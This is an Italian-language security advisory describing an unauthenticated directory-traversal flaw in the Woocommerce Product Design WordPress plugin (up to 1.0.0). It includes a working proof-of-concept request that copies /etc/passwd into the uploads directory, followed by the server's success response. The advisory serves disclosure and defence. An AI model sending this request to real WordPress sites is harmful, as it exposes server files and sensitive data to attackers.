
Woocommerce Product Design <= 1.0.0 - Download Arbitrario di File Non Autenticato
Woocommerce Product Design <= 1.0.0 - Download Arbitrario di File Non Autenticato
Il plugin Woocommerce Product Design per WordPress è vulnerabile a Directory Traversal in tutte le versioni fino alla 1.0.0 inclusa. Ciò consente ad attaccanti non autenticati di leggere il contenuto di file arbitrari sul server, che possono contenere informazioni sensibili.
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
action=pc_added_uploaded_image&file[path]=/etc/passwd
{
"path": "/var/www/html/wp-content/uploads/wcpc/images/uploaded_images/passwd",
"message": "Image Uploaded Successfully",
"url": "https://wp-dev.ddev.site/wp-content/uploads/wcpc/images/uploaded_images/passwd",
"status": "success"
}